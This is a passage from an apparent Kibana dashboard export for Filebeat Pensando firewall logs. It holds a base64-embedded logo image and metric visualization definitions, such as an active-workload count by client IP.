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)](https://pensando.io)", + "openLinksInNewTab": true + }, + "title": "Logo [Filebeat Pensando]", + "type": "markdown" + } + }, + "id": "39e26d70-cc4d-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [], + "type": "visualization", + "updated_at": "2020-09-10T22:03:40.485Z", + "version": "WzI1MDIsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Active Workload Count [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Active Workloads", + "field": "client.ip" + }, + "schema": "metric", + "type": "cardinality" + } + ], + "params": { + "addLegend": false, + "addTooltip": true, + "metric": { + "colorSchema": "Green to Red", + "colorsRange": [ + { + "from": 0, + "to": 10000 + } + ], + "invertColors": false, + "labels": { + "show": false + }, + "metricColorMode": "None", + "percentageMode": false, + "style": { + "bgColor": false, + "bgFill": "#000", + "fontSize": 36, + "labelColor": false, + "subText": "" + }, + "useRanges": false + }, + "type": "metric" + }, + "title": "Active Workload Count [Filebeat Pensando]", + "type": "metric" + } + }, + "id": "bc6a36b0-cdba-11ea-a0ef-8f5241e594be", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T22:32:05.773Z", + "version": "WzI1NjIsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "DFW Allowed Count [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "" + }, + 